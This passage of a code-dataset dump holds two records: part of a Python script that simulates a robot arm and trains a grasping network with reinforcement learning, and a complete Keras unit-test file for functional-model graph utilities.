sure about the values\n # self.workspace_limits = np.asarray([[-0.75, -0.25], [-0.25, 0.25], [0.0001, 0.4]])\n self.workspace_limits = np.asarray([[-0.7, -0.3], [-0.2, 0.2], [0.0001, 0.4]])\n self.heightmap_resolution = 0.002 # No idea # HHHHHHHHHHHHHERRRRRRRRRREEEEEEEEEEEEEEE\n\n # Initiate simulation options\n client.simxSynchronous(False)\n 
client.simxGetSimulationStepStarted(client.simxDefaultSubscriber(simulationStepStarted));\n client.simxGetSimulationStepDone(client.simxDefaultSubscriber(simulationStepDone))\n client.simxStartSimulation(client.simxDefaultPublisher())\n\n client.simxAddStatusbarMessage(\"Starting!!!\", client.simxDefaultPublisher())\n print('Started Simulation!')\n\n\n self.setup_sim_camera()\n\n\n def setup_sim_camera(self):\n\n # Get handle to camera\n sim_ret, self.cam_handle = client.simxGetObjectHandle('vision_sensor', client.simxServiceCall())\n\n # Get camera pose and intrinsics in simulation\n sim_ret, cam_position = client.simxGetObjectPosition(self.cam_handle, -1, client.simxServiceCall())\n sim_ret, cam_orientation = client.simxGetObjectOrientation(self.cam_handle, -1, client.simxServiceCall())\n cam_trans = np.eye(4,4)\n cam_trans[0:3,3] = np.asarray(cam_position)\n cam_orientation = [-cam_orientation[0], -cam_orientation[1], -cam_orientation[2]]\n cam_rotm = np.eye(4,4)\n cam_rotm[0:3,0:3] = np.linalg.inv(euler2rotm(cam_orientation))\n self.cam_pose = np.dot(cam_trans, cam_rotm) # Compute rigid transformation representating camera pose\n self.cam_intrinsics = np.asarray([[618.62, 0, 320], [0, 618.62, 240], [0, 0, 1]])\n self.cam_depth_scale = 1\n\n # Get background image\n self.bg_color_img, self.bg_depth_img = self.get_camera_data()\n self.bg_depth_img = self.bg_depth_img * self.cam_depth_scale\n\n\n # Open Gripper\n def open_gripper(self):\n motor_velocity = 0.5 # m/s\n motor_force = 100 # N\n client.simxSetJointForce(self.gripper_joint_handle, motor_force, client.simxServiceCall())\n client.simxSetJointTargetVelocity(self.gripper_joint_handle, motor_velocity, client.simxServiceCall())\n gripper_position = client.simxGetJointPosition(self.gripper_joint_handle, client.simxServiceCall())\n while gripper_position[1] < 0:\n\n gripper_position = client.simxGetJointPosition(self.gripper_joint_handle, client.simxServiceCall())\n\n # client.simxSynchronousTrigger()\n # client.simxSpinOnce()\n\n # Close Gripper\n def close_gripper(self):\n motor_velocity = -0.5 # m/s\n motor_force = 100 # N\n client.simxSetJointForce(self.gripper_joint_handle, motor_force, client.simxServiceCall())\n client.simxSetJointTargetVelocity(self.gripper_joint_handle, motor_velocity, client.simxServiceCall())\n _, gripper_position = client.simxGetJointPosition(self.gripper_joint_handle, client.simxServiceCall())\n right_force_sensor_feedback= client.simxReadForceSensor(self.right_force_sensor_handle, client.simxServiceCall())\n gripper_fully_closed = False\n while gripper_position > -0.046:# and right_force_sensor_feedback[2][2] > -80:\n _, new_gripper_joint_position = client.simxGetJointPosition(self.gripper_joint_handle, client.simxServiceCall())\n # right_force_sensor_feedback = client.simxReadForceSensor(self.right_force_sensor_handle, client.simxServiceCall())\n if new_gripper_joint_position >= gripper_position:\n return gripper_fully_closed\n gripper_position = new_gripper_joint_position\n\n gripper_fully_closed = True\n\n return gripper_fully_closed\n\n\n def move_to_rand(self):\n random_position = [np.random.randint(limits[0], limits[1]) for limits in self.workspace_limits]\n random_position = [+.5163e-01, +4.4720e-01, +3.8412e-01] # transform_position_cam_to_global(random_position)\n WORLD_FRAME = -1 # vision_sensor_handle\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n move_direction = np.asarray([random_position[0] - current_position[0], 
random_position[1] - current_position[1], random_position[2] - current_position[2]])\n move_magnitude = np.linalg.norm(move_direction)\n step = 0.02*(move_direction/move_magnitude) # 0.02\n num_move_steps = int(np.floor(move_magnitude/0.02))\n\n for i_step in range(num_move_steps):\n next_position = [current_position[0] + step[0], current_position[1] + step[1], current_position[2] + step[2]]\n client.simxSetObjectPosition(self.target_right_handle, WORLD_FRAME, next_position, client.simxServiceCall())\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n # client.simxSynchronousTrigger()\n # client.simxSpinOnce()\n\n # next_position = [current_position[0] + step[0], current_position[1] + step[1], current_position[2] + step[2]]\n # client.simxSetObjectPosition(target_right_handle, WORLD_FRAME, next_position, client.simxServiceCall())\n\n\n def move_to(self, target):\n random_position = target # transform_position_cam_to_global(random_position)\n WORLD_FRAME = 20 # -1 # vision_sensor_handle\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n WORLD_FRAME = -1# self.vision_sensor_handle\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n \n move_direction = np.asarray([random_position[0] - current_position[0], random_position[1] - current_position[1], random_position[2] - current_position[2]])\n move_magnitude = np.linalg.norm(move_direction)\n step = 0.02*(move_direction/move_magnitude) # 0.02\n num_move_steps = int(np.floor(move_magnitude/0.02))\n\n for i_step in range(num_move_steps):\n next_position = [current_position[0] + step[0], current_position[1] + step[1], current_position[2] + step[2]]\n client.simxSetObjectPosition(self.target_right_handle, WORLD_FRAME, next_position, client.simxServiceCall())\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n # client.simxSynchronousTrigger()\n # client.simxSpinOnce()\n\n # next_position = [current_position[0] + step[0], current_position[1] + step[1], current_position[2] + step[2]]\n # client.simxSetObjectPosition(target_right_handle, WORLD_FRAME, next_position, client.simxServiceCall())\n\n\n\n def get_camera_data(self):\n\n start_time = time.time()\n rgb_ret, rgb_res, rgb_img_raw = client.simxGetVisionSensorImage(self.vision_sensor_handle, False, client.simxServiceCall())\n end_time = time.time()\n # print('Elapsed rgb capture: {}'.format(end_time-start_time))\n\n start_time = time.time()\n d_ret, d_res, d_img_raw = client.simxGetVisionSensorDepthBuffer(self.vision_sensor_handle, False, True, client.simxServiceCall())\n end_time = time.time()\n # print('Elapsed depth capture: {}'.format(end_time-start_time))\n\n assert (d_ret and rgb_ret) == True\n\n client.simxSetVisionSensorImage(self.side_vision_sensor_handle, False, rgb_img_raw, client.simxDefaultPublisher())\n \n depth_img = depth_img_from_bytes(d_img_raw, rgb_res)\n # np.save('depth_img', depth_img)\n\n color_img = rgb_img_from_bytes(rgb_img_raw, rgb_res)\n # np.save('color_img', color_img)\n\n return color_img, depth_img\n\n def get_input_color_and_depth_data(self):\n color_img, depth_img = self.get_camera_data()\n color_img = get_prepared_img(color_img, 'rgb')\n depth_img = get_prepared_img(depth_img, 'depth')\n color_heightmap, depth_heightmap = get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, 
robot.workspace_limits, robot.heightmap_resolution)\n valid_depth_heightmap = depth_heightmap.copy()\n valid_depth_heightmap[np.isnan(valid_depth_heightmap)] = 0\n input_color_data, input_depth_data = get_input_tensors(color_heightmap, valid_depth_heightmap)\n\n return input_color_data, input_depth_data\n\n\n\n def reset_cube(self):\n relObjHandle = -1\n position = [-5.1500e-01, -1.5000e-02, +1.5000e-02]\n orientation = [0, 0, 0]\n ret_pos = client.simxSetObjectPosition(self.cube_handle, relObjHandle, position, client.simxServiceCall())\n ret_orient = client.simxSetObjectOrientation(self.cube_handle, relObjHandle, orientation, client.simxServiceCall())\n if not (ret_pos and ret_orient):\n print('Failed to set cube back to position')\n exit\n\n\n def grasp(self, position, best_rotation_angle):\n\n # Initialize variables that influence reward\n grasp_success = False\n change_detected = False\n\n # Compute tool orientation from heightmap rotation angle\n tool_rotation_angle = (best_rotation_angle % np.pi) - np.pi/2\n\n # Avoid collision with floor\n position = np.asarray(position).copy()\n position[2] = max(position[2] - 0.04, self.workspace_limits[2][0] + 0.02)\n\n # Move gripper to location above grasp target\n grasp_location_margin = 0.15\n # sim_ret, UR5_target_handle = vrep.simxGetObjectHandle(self.sim_client,'UR5_target',vrep.simx_opmode_blocking)\n location_above_grasp_target = (position[0], position[1], position[2] + grasp_location_margin)\n\n # Compute gripper position and linear movement increments\n tool_position = location_above_grasp_target\n self.move_to(tool_position)\n\n # Ensure gripper is open\n self.open_gripper()\n\n # Approach grasp target\n self.move_to(position)\n\n # Close gripper to grasp target\n gripper_full_closed = self.close_gripper()\n\n # Move gripper to location above grasp target\n self.move_to(location_above_grasp_target)\n\n # Check if grasp is successful\n gripper_full_closed = self.close_gripper()\n grasp_success = not gripper_full_closed\n\n print('Grasp success: {}'.format(grasp_success))\n\n return grasp_success\n\n\n def trainer_forward(self, color_heightmap, depth_heightmap, is_volatile=False, specific_rotation=-1):\n # Apply 2x scale to input heightmaps\n color_heightmap_2x = ndimage.zoom(color_heightmap, zoom=[2,2,1], order=0)\n depth_heightmap_2x = ndimage.zoom(depth_heightmap, zoom=[2,2], order=0)\n assert(color_heightmap_2x.shape[0:2] == depth_heightmap_2x.shape[0:2])\n\n # Add extra padding (to handle rotations inside network)\n diag_length = float(color_heightmap_2x.shape[0]) * np.sqrt(2)\n diag_length = np.ceil(diag_length/32)*32\n padding_width = int((diag_length - color_heightmap_2x.shape[0])/2)\n color_heightmap_2x_r = np.pad(color_heightmap_2x[:,:,0], padding_width, 'constant', constant_values=0)\n color_heightmap_2x_r.shape = (color_heightmap_2x_r.shape[0], color_heightmap_2x_r.shape[1], 1)\n color_heightmap_2x_g = np.pad(color_heightmap_2x[:,:,1], padding_width, 'constant', constant_values=0)\n color_heightmap_2x_g.shape = (color_heightmap_2x_g.shape[0], color_heightmap_2x_g.shape[1], 1)\n color_heightmap_2x_b = np.pad(color_heightmap_2x[:,:,2], padding_width, 'constant', constant_values=0)\n color_heightmap_2x_b.shape = (color_heightmap_2x_b.shape[0], color_heightmap_2x_b.shape[1], 1)\n color_heightmap_2x = np.concatenate((color_heightmap_2x_r, color_heightmap_2x_g, color_heightmap_2x_b), axis=2)\n depth_heightmap_2x = np.pad(depth_heightmap_2x, padding_width, 'constant', constant_values=0)\n\n # Pre-process color image (scale and 
normalize)\n image_mean = [0.485, 0.456, 0.406]\n image_std = [0.229, 0.224, 0.225]\n input_color_image = color_heightmap_2x.astype(float)/255\n for c in range(3):\n input_color_image[:,:,c] = (input_color_image[:,:,c] - image_mean[c])/image_std[c]\n\n # Pre-process depth image (normalize)\n image_mean = [0.01, 0.01, 0.01]\n image_std = [0.03, 0.03, 0.03]\n depth_heightmap_2x.shape = (depth_heightmap_2x.shape[0], depth_heightmap_2x.shape[1], 1)\n input_depth_image = np.concatenate((depth_heightmap_2x, depth_heightmap_2x, depth_heightmap_2x), axis=2)\n for c in range(3):\n input_depth_image[:,:,c] = (input_depth_image[:,:,c] - image_mean[c])/image_std[c]\n\n # Construct minibatch of size 1 (b,c,h,w)\n input_color_image.shape = (input_color_image.shape[0], input_color_image.shape[1], input_color_image.shape[2], 1)\n input_depth_image.shape = (input_depth_image.shape[0], input_depth_image.shape[1], input_depth_image.shape[2], 1)\n input_color_data = torch.from_numpy(input_color_image.astype(np.float32)).permute(3,2,0,1)\n input_depth_data = torch.from_numpy(input_depth_image.astype(np.float32)).permute(3,2,0,1)\n\n # Pass input data through model\n output_prob, state_feat = self.model.forward(input_color_data, input_depth_data, is_volatile=is_volatile) # is_volatile, specific_rotation)\n\n # Return Q values (and remove extra padding)\n for rotate_idx in range(len(output_prob)):\n if rotate_idx == 0:\n grasp_predictions = output_prob[rotate_idx][0].cpu().data.numpy()[:,0,int(padding_width/2):int(color_heightmap_2x.shape[0]/2 - padding_width/2),int(padding_width/2):int(color_heightmap_2x.shape[0]/2 - padding_width/2)]\n else:\n grasp_predictions = np.concatenate((grasp_predictions, output_prob[rotate_idx][0].cpu().data.numpy()[:,0,int(padding_width/2):int(color_heightmap_2x.shape[0]/2 - padding_width/2),int(padding_width/2):int(color_heightmap_2x.shape[0]/2 - padding_width/2)]), axis=0) \n\n return grasp_predictions, state_feat\n\n # Compute labels and backpropagate\n def backprop(self, color_heightmap, depth_heightmap, primitive_action, best_pix_ind, label_value): \n\n output_prob_dim = 288\n heightmap_dim = 200\n starting_pixel = int((output_prob_dim - heightmap_dim) / 2)\n\n # Compute labels\n label = np.zeros((1,output_prob_dim,output_prob_dim))\n action_area = np.zeros((heightmap_dim,heightmap_dim)) # np.zeros((224,224))\n action_area[best_pix_ind[1]][best_pix_ind[2]] = 1\n # blur_kernel = np.ones((5,5),np.float32)/25\n # action_area = cv2.filter2D(action_area, -1, blur_kernel)\n tmp_label = np.zeros((heightmap_dim,heightmap_dim))\n tmp_label[action_area > 0] = label_value\n label[0,starting_pixel:(output_prob_dim-starting_pixel),starting_pixel:(output_prob_dim-starting_pixel)] = tmp_label\n\n # Compute label mask\n label_weights = np.zeros(label.shape)\n tmp_label_weights = np.zeros((heightmap_dim,heightmap_dim))\n tmp_label_weights[action_area > 0] = 1\n label_weights[0,starting_pixel:(output_prob_dim-starting_pixel),starting_pixel:(output_prob_dim-starting_pixel)] = tmp_label_weights\n\n # Compute loss and backward pass\n self.optimizer.zero_grad()\n loss_value = 0\n\n # Do forward pass with specified rotation (to save gradients)\n grasp_predictions, state_feat = self.trainer_forward(color_heightmap, depth_heightmap, is_volatile=False, specific_rotation=best_pix_ind[0])\n\n if self.use_cuda:\n loss = self.criterion(self.model.output_prob[0][0].view(1,output_prob_dim,output_prob_dim), Variable(torch.from_numpy(label).float().cuda())) * 
Variable(torch.from_numpy(label_weights).float().cuda(),requires_grad=False)\n else:\n loss = self.criterion(self.model.output_prob[0][0].view(1,output_prob_dim,output_prob_dim), Variable(torch.from_numpy(label).float())) * Variable(torch.from_numpy(label_weights).float(),requires_grad=False)\n loss = loss.sum()\n loss.backward()\n loss_value = loss.cpu().data.numpy()\n\n opposite_rotate_idx = (best_pix_ind[0] + self.model.num_rotations/2) % self.model.num_rotations\n\n grasp_predictions, state_feat = self.trainer_forward(color_heightmap, depth_heightmap, is_volatile=False, specific_rotation=opposite_rotate_idx)\n\n if self.use_cuda:\n loss = self.criterion(self.model.output_prob[0][0].view(1,output_prob_dim,output_prob_dim), Variable(torch.from_numpy(label).float().cuda())) * Variable(torch.from_numpy(label_weights).float().cuda(),requires_grad=False)\n else:\n loss = self.criterion(self.model.output_prob[0][0].view(1,output_prob_dim,output_prob_dim), Variable(torch.from_numpy(label).float())) * Variable(torch.from_numpy(label_weights).float(),requires_grad=False)\n\n loss = loss.sum() \n loss.backward()\n loss_value = loss.cpu().data.numpy()\n\n loss_value = loss_value/2\n\n print('Training loss: %f' % (loss_value))\n self.optimizer.step()\n\n\n def get_label_value(self, primitive_action, grasp_success, change_detected, prev_grasp_predictions, next_color_heightmap, next_depth_heightmap):\n\n # Compute current reward\n current_reward = 0\n if grasp_success:\n current_reward = 1.0\n elif change_detected:\n current_reward = 0.5\n\n # Compute future reward\n if not change_detected and not grasp_success:\n future_reward = 0\n else:\n next_grasp_predictions, next_state_feat = self.trainer_forward(next_color_heightmap, next_depth_heightmap, is_volatile=True)\n future_reward = np.max(next_grasp_predictions)\n\n # # Experiment: use Q differences\n # push_predictions_difference = next_push_predictions - prev_push_predictions\n # grasp_predictions_difference = next_grasp_predictions - prev_grasp_predictions\n # future_reward = max(np.max(push_predictions_difference), np.max(grasp_predictions_difference))\n\n print('Current reward: %f' % (current_reward))\n print('Future reward: %f' % (future_reward))\n expected_reward = current_reward + self.future_reward_discount * future_reward\n print('Expected reward: %f + %f x %f = %f' % (current_reward, self.future_reward_discount, future_reward, expected_reward))\n \n return expected_reward, current_reward\n\n\n\n\n def get_action(self, iteration):\n\n self.execute_action = True\n\n for i in range(2):\n color_img, depth_img = self.get_camera_data()\n color_img = get_prepared_img(color_img, 'rgb')\n depth_img = get_prepared_img(depth_img, 'depth')\n color_heightmap, depth_heightmap = get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, robot.workspace_limits, robot.heightmap_resolution)\n valid_depth_heightmap = depth_heightmap.copy()\n valid_depth_heightmap[np.isnan(valid_depth_heightmap)] = 0\n\n # Save RGB-D images and RGB-D heightmaps # trainer.iteration\n self.logger.save_images(1, color_img, depth_img, '0') # trainer.iteration\n self.logger.save_heightmaps(1, color_heightmap, valid_depth_heightmap, '0') # trainer.iteration\n\n\n grasp_predictions, state_feat = self.trainer_forward(color_heightmap, valid_depth_heightmap, is_volatile=True)\n\n\n ############################################ EXECUTING THREAD ############################################\n ############################################ EXECUTING THREAD 
############################################\n ############################################ EXECUTING THREAD ############################################\n\n if self.execute_action:\n\n explore_actions = np.random.uniform() < self.explore_prob\n if explore_actions: # Exploitation (do best action) vs exploration (do other action)\n print('Strategy: explore (exploration probability: %f)' % (self.explore_prob))\n # nonlocal_variables['primitive_action'] = 'push' if np.random.randint(0,2) == 0 else 'grasp'\n else:\n print('Strategy: exploit (exploration probability: %f)' % (self.explore_prob))\n\n print('grasp_predictions.shape: {}'.format(grasp_predictions.shape))\n # Get pixel location and rotation with highest affordance prediction from heuristic algorithms (rotation, y, x)\n best_pix_ind = np.unravel_index(np.argmax(grasp_predictions), grasp_predictions.shape)\n predicted_value = np.max(grasp_predictions)\n\n # Save predicted confidence value\n self.predicted_value_log.append([predicted_value])\n self.logger.write_to_log('predicted-value', self.predicted_value_log)\n \n print('best_pix_ind[0]: {}, best_pix_ind[1]: {}, best_pix_ind[2]: {}'.format(best_pix_ind[0], best_pix_ind[1], best_pix_ind[2]))\n\n # Compute 3D position of pixel\n print('Action: %s at (%d, %d, %d)' % ('Grasp', best_pix_ind[0], best_pix_ind[1], best_pix_ind[2]))\n best_rotation_angle = np.deg2rad(best_pix_ind[0]*(360.0/robot.model.num_rotations))\n best_pix_x = best_pix_ind[2] # 118\n best_pix_y = best_pix_ind[1] # 115\n primitive_position = [best_pix_x * self.heightmap_resolution + self.workspace_limits[0][0], best_pix_y * self.heightmap_resolution + self.workspace_limits[1][0], valid_depth_heightmap[best_pix_y][best_pix_x] + self.workspace_limits[2][0]]\n position = primitive_position\n\n # Save executed primitive\n self.executed_action_log.append([1, best_pix_ind[0], best_pix_ind[1], best_pix_ind[2]]) # 1 - grasp\n self.logger.write_to_log('executed-action', self.executed_action_log)\n\n\n # Execute Primitive\n grasp_success = self.grasp(position, best_rotation_angle)\n\n self.execute_action = False\n\n\n ########################## TRAINING ##########################\n ########################## TRAINING ##########################\n ########################## TRAINING ##########################\n\n # Run training iteration in current thread (aka training thread)\n if 'prev_color_img' in locals():\n\n # Detect changes\n depth_diff = abs(depth_heightmap - prev_depth_heightmap)\n depth_diff[np.isnan(depth_diff)] = 0\n depth_diff[depth_diff > 0.3] = 0\n depth_diff[depth_diff < 0.01] = 0\n depth_diff[depth_diff > 0] = 1\n change_threshold = 300\n change_value = np.sum(depth_diff)\n change_detected = change_value > change_threshold or prev_grasp_success\n print('Change detected: %r (value: %d)' % (change_detected, change_value))\n\n # if change_detected:\n # if prev_primitive_action == 'push':\n # no_change_count[0] = 0\n # elif prev_primitive_action == 'grasp':\n # no_change_count[1] = 0\n # else:\n # if prev_primitive_action == 'push':\n # no_change_count[0] += 1\n # elif prev_primitive_action == 'grasp':\n # no_change_count[1] += 1\n\n # Compute training labels\n label_value, prev_reward_value = self.get_label_value(prev_primitive_action, \n prev_grasp_success, \n change_detected, \n prev_grasp_predictions, \n color_heightmap, # Fix get_label since it's using the local_network call, instead of the trainer call like in the original code, which goes through the preprocessing step.\n valid_depth_heightmap)\n \n 
self.label_value_log.append([label_value])\n            self.logger.write_to_log('label-value', self.label_value_log)\n            self.reward_value_log.append([prev_reward_value])\n            self.logger.write_to_log('reward-value', self.reward_value_log)\n\n            # Backpropagate\n            self.backprop(prev_color_heightmap, prev_valid_depth_heightmap, prev_primitive_action, prev_best_pix_ind, label_value)\n\n            self.explore_prob = max(0.5 * np.power(0.9998, iteration),0.1) if self.explore_rate_decay else 0.5\n\n\n            # Do sampling for experience replay\n            if self.experience_replay:\n                sample_primitive_action = prev_primitive_action\n                sample_primitive_action_id = 1\n                sample_reward_value = 0 if prev_reward_value == 1.0 else 1.0\n\n                # Get samples of the same primitive but with different results.\n                # Indices where the primitive matches and the reward differs; same shape as self.reward_value_log and self.executed_action_log.\n                # argwhere returns the indices of the True booleans from the preceding operation.\n                sample_ind = np.argwhere(np.logical_and(np.asarray(self.reward_value_log)[1:iteration,0] == sample_reward_value, np.asarray(self.executed_action_log)[1:iteration,0] == sample_primitive_action_id))\n\n\n                print('sample_reward_value: {}'.format(sample_reward_value))\n                print()\n                print('self.reward_value_log: {}'.format(self.reward_value_log))\n                print()\n                print('self.executed_action_log: {}'.format(self.executed_action_log))\n\n                if sample_ind.size > 0:\n                    # Find sample with highest surprise value\n                    sample_surprise_values = np.abs(np.asarray(self.predicted_value_log)[sample_ind[:,0]] - np.asarray(self.label_value_log)[sample_ind[:,0]])\n                    sorted_surprise_ind = np.argsort(sample_surprise_values[:,0])\n                    sorted_sample_ind = sample_ind[sorted_surprise_ind,0]\n                    pow_law_exp = 2\n                    rand_sample_ind = int(np.round(np.random.power(pow_law_exp, 1)*(sample_ind.size-1)))\n                    sample_iteration = sorted_sample_ind[rand_sample_ind]\n                    print('Experience replay: iteration %d (surprise value: %f)' % (sample_iteration, sample_surprise_values[sorted_surprise_ind[rand_sample_ind]]))\n\n                    # Load sample RGB-D heightmap\n                    sample_color_heightmap = cv2.imread(os.path.join(self.logger.color_heightmaps_directory, '%06d.0.color.png' % (sample_iteration)))\n                    sample_color_heightmap = cv2.cvtColor(sample_color_heightmap, cv2.COLOR_BGR2RGB)\n                    sample_depth_heightmap = cv2.imread(os.path.join(self.logger.depth_heightmaps_directory, '%06d.0.depth.png' % (sample_iteration)), -1)\n                    sample_depth_heightmap = sample_depth_heightmap.astype(np.float32)/100000\n\n                    # Compute forward pass with sample (trainer.forward in the original code; this port exposes it as self.trainer_forward)\n                    with torch.no_grad():\n                        sample_grasp_predictions, sample_state_feat = self.trainer_forward(sample_color_heightmap, sample_depth_heightmap, is_volatile=True)\n\n                    # Load next sample RGB-D heightmap\n                    next_sample_color_heightmap = cv2.imread(os.path.join(self.logger.color_heightmaps_directory, '%06d.0.color.png' % (sample_iteration+1)))\n                    next_sample_color_heightmap = cv2.cvtColor(next_sample_color_heightmap, cv2.COLOR_BGR2RGB)\n                    next_sample_depth_heightmap = cv2.imread(os.path.join(self.logger.depth_heightmaps_directory, '%06d.0.depth.png' % (sample_iteration+1)), -1)\n                    next_sample_depth_heightmap = next_sample_depth_heightmap.astype(np.float32)/100000\n\n                    sample_grasp_success = sample_reward_value == 1\n                    # sample_change_detected = sample_push_success  # the 'push' primitive was removed in this port; only the commented-out call below used it\n                    # new_sample_label_value, _ = trainer.get_label_value(sample_primitive_action, sample_push_success, sample_grasp_success, sample_change_detected, sample_push_predictions, sample_grasp_predictions, 
next_sample_color_heightmap, next_sample_depth_heightmap)\n\n # Get labels for sample and backpropagate\n sample_best_pix_ind = (np.asarray(self.executed_action_log)[sample_iteration,1:4]).astype(int)\n self.backprop(sample_color_heightmap, sample_depth_heightmap, sample_primitive_action, sample_best_pix_ind, self.label_value_log[sample_iteration])\n\n # Recompute prediction value and label for replay buffer\n self.predicted_value_log[sample_iteration] = [np.max(sample_grasp_predictions)]\n # trainer.label_value_log[sample_iteration] = [new_sample_label_value]\n\n else:\n print('Not enough prior training samples. Skipping experience replay.')\n\n\n \n self.reset_cube()\n\n\n\n\n # Save information for next training step\n prev_color_img = color_img.copy()\n prev_depth_img = depth_img.copy()\n prev_color_heightmap = color_heightmap.copy()\n prev_depth_heightmap = depth_heightmap.copy()\n prev_valid_depth_heightmap = valid_depth_heightmap.copy()\n prev_grasp_predictions = grasp_predictions.copy()\n prev_grasp_success = grasp_success\n prev_primitive_action = 'grasp'\n prev_best_pix_ind = best_pix_ind\n\n\n######################################################################################################\n######################################################################################################\n######################################## Main ########################################################\n######################################################################################################\n######################################################################################################\n\n robot = Robot(USE_CUDA=True)\n for iter in range(1, 101):\n robot.get_action(iter)\n\n # Stop simulation\n print('Stopping Simulation...')\n client.simxStopSimulation(client.simxServiceCall())\n print('Simulation Over.')\n\n\n \n\n # NUM_EPISODES = 1000\n\n # for i_episode in range(1, NUM_EPISODES+1):\n \n\n\n","sub_path":"back_up_robot_single.py","file_name":"back_up_robot_single.py","file_ext":"py","file_size_in_byte":36306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
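get_label_value in the record above builds a one-step TD target, label = r + gamma * max Q(s', a'); the arithmetic in isolation (all values invented for illustration):

import numpy as np

future_reward_discount = 0.5                 # gamma, as in the record above
current_reward = 1.0                         # grasp succeeded
next_grasp_predictions = np.array([[0.2, 0.6], [0.1, 0.3]])

future_reward = np.max(next_grasp_predictions)                        # 0.6
expected_reward = current_reward + future_reward_discount * future_reward
assert np.isclose(expected_reward, 1.3)      # 1.0 + 0.5 * 0.6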
+{"seq_id":"87175783","text":"# Copyright 2021 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#,============================================================================\n\"\"\"Tests for functional_utils.\"\"\"\n\nfrom keras import keras_parameterized\nfrom keras import layers\nfrom keras import models\nfrom keras.engine import functional_utils\nfrom keras.engine import input_layer as input_layer_lib\n\nimport numpy as np\nimport tensorflow.compat.v2 as tf\n\n\nclass FunctionalModelSlideTest(keras_parameterized.TestCase):\n\n def testfind_nodes_by_inputs_and_outputs(self):\n inputs = input_layer_lib.Input((10,))\n unconnected_inputs = input_layer_lib.Input((10,))\n x = layers.Dense(8)(inputs)\n y = layers.Dense(6)(x)\n output = layers.Dense(4)(y)\n\n nodes_in_graph = functional_utils.find_nodes_by_inputs_and_outputs(\n x, output)\n self.assertLen(nodes_in_graph, 2)\n expected_nodes = [output.node, y.node]\n self.assertCountEqual(nodes_in_graph, expected_nodes)\n\n # Make sure we raise error if we specify invalid input/output pair\n with self.assertRaisesRegex(\n ValueError, 'Found input tensor cannot be reached'):\n functional_utils.find_nodes_by_inputs_and_outputs(output, x)\n\n with self.assertRaisesRegex(\n ValueError, 'Found input tensor cannot be reached'):\n functional_utils.find_nodes_by_inputs_and_outputs(unconnected_inputs,\n output)\n\n with self.assertRaisesRegex(\n ValueError, 'Found unvisited input tensors that are disconnected'):\n functional_utils.find_nodes_by_inputs_and_outputs(\n [inputs, unconnected_inputs], output)\n\n def testfind_nodes_by_inputs_and_outputs_with_complicated_network(self):\n input1 = input_layer_lib.Input((10,))\n input2 = input_layer_lib.Input((10,))\n input3 = input_layer_lib.Input((10,))\n unconnected_input = input_layer_lib.Input((10,))\n\n dense1 = layers.Dense(4, name='dense1')\n dense2 = layers.Dense(4, name='dense2')\n # dense1 are shared between input1 and input2\n a = dense1(input1)\n b = dense1(input2)\n\n c = layers.Add()([a, b])\n d = dense2(input3)\n e = layers.Add()([c, d])\n # There are 5 nodes (invoke of __call__) in the graph.\n\n nodes = functional_utils.find_nodes_by_inputs_and_outputs(input1, a)\n self.assertCountEqual(nodes, [a.node])\n\n nodes = functional_utils.find_nodes_by_inputs_and_outputs(input2, b)\n self.assertCountEqual(nodes, [b.node])\n\n nodes = functional_utils.find_nodes_by_inputs_and_outputs([input2, input1],\n c)\n # This should contains 2 dense call and 1 add\n self.assertCountEqual(nodes, [a.node, b.node, c.node])\n\n # Missing input3\n with self.assertRaisesRegex(\n ValueError, 'Found input tensor cannot be reached'):\n functional_utils.find_nodes_by_inputs_and_outputs([input1, input2], e)\n\n nodes = functional_utils.find_nodes_by_inputs_and_outputs(\n [input1, input2, input3], e)\n self.assertCountEqual(nodes, [a.node, b.node, c.node, d.node, e.node])\n\n # Make sure we can create from intermediate tensors\n nodes = 
functional_utils.find_nodes_by_inputs_and_outputs([a, b, input3], e)\n self.assertCountEqual(nodes, [c.node, d.node, e.node])\n # Also make sure we can add intermediate outputs\n nodes = functional_utils.find_nodes_by_inputs_and_outputs([a, b, input3],\n [d, e])\n self.assertCountEqual(nodes, [c.node, d.node, e.node])\n\n # input1 and 2 are not needed for computing d\n with self.assertRaisesRegex(\n ValueError, 'Found unvisited input tensors that are disconnected'):\n functional_utils.find_nodes_by_inputs_and_outputs(\n [input1, input2, input3], d)\n\n with self.assertRaisesRegex(\n ValueError, 'Found unvisited input tensors that are disconnected'):\n functional_utils.find_nodes_by_inputs_and_outputs(\n [a, b, input3, unconnected_input], [e, d, c])\n\n def test_build_model_from_intermediate_tensor(self):\n batch_size = 4\n inputs = input_layer_lib.Input(shape=(8,))\n layer1 = layers.Dense(32)\n layer2 = layers.Dense(16)\n x = layer1(inputs)\n y = layer2(x)\n cloned_inputs, cloned_outputs = functional_utils.clone_graph_nodes(x, y)\n # Make sure the inputs and outputs are cloned.\n self.assertIsNot(x, cloned_inputs)\n self.assertIsNot(y, cloned_outputs)\n # Make sure a new node is attached to layer2, which mimic y = layer2(x)\n self.assertLen(layer2.inbound_nodes, 2)\n\n model = models.Model(cloned_inputs, cloned_outputs)\n self.assertIsInstance(model, models.Model)\n\n model.compile('rmsprop', 'mse')\n model.fit(np.random.randn(batch_size, 32), np.random.randn(batch_size, 16))\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"keras/engine/functional_utils_test.py","file_name":"functional_utils_test.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
